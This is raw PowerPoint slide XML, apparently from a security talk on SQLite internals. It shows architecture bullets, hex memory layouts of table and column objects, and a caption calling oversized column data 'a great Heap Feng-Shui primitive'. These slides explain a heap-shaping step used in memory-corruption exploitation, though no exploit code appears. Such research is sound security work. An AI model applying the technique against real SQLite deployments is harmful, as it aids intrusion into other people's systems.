        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="4361657"/>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Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234183" y="2658422"/>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6234183" y="3087822"/>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6234183" y="3513619"/>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6234183" y="3953489"/>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TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068614" y="5765902"/>
            <a:ext cx="2280660" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEST_COLUMN_NAME</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Curved Connector 32"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7211983" y="4768940"/>
            <a:ext cx="1194695" cy="799228"/>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7173386" y="6135234"/>
            <a:ext cx="2110336" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>∽ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1GB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10566048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SQLite Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5306787" y="1886176"/>
            <a:ext cx="6047014" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Internally a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Tokenizer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Parser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Code Generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Bytecode Engine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B-Trees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> to store Table values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Uses a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Page Cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="https://blog.exodusintel.com/wp-content/uploads/2019/01/sqlite_architecture.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761" y="1690688"/>
            <a:ext cx="3739556" cy="45468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0669865"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20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30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40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50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60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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>70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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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481139" y="5325970"/>
            <a:ext cx="2041755" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2265589" y="2189771"/>
            <a:ext cx="2455118" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>21 54 64 A0 21 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 4F A1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>64 A0 21 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>50 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2327275" y="3511550"/>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Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2323990" y="2867612"/>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6" name="Curved Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4662306" y="1884332"/>
            <a:ext cx="1421248" cy="1088055"/>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2446849" y="4656933"/>
            <a:ext cx="2110336" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object count</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Curved Connector 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2323989" y="2972386"/>
            <a:ext cx="157149" cy="2538249"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -424526"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="2222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2122083" y="2073304"/>
            <a:ext cx="1520278" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496433" y="3721100"/>
            <a:ext cx="5584" cy="935833"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2222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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276678" y="405760"/>
            <a:ext cx="4564285" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is a great</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234564" y="1805068"/>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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234183" y="2233086"/>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Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="4361657"/>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Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234183" y="2658422"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234183" y="3087822"/>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Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234183" y="3513619"/>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Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234183" y="3953489"/>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TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068614" y="5765902"/>
            <a:ext cx="2280660" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEST_COLUMN_NAME</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Curved Connector 27"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7211983" y="4768940"/>
            <a:ext cx="1194695" cy="799228"/>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173386" y="6135234"/>
            <a:ext cx="2110336" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>∽ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1GB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3060320354"/>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6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20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30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40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50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60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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>70 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083554" y="1690335"/>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083554" y="5281260"/>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962562" y="1416154"/>
            <a:ext cx="2609937" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240558" y="4361657"/>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TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7068614" y="5765902"/>
            <a:ext cx="2280660" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
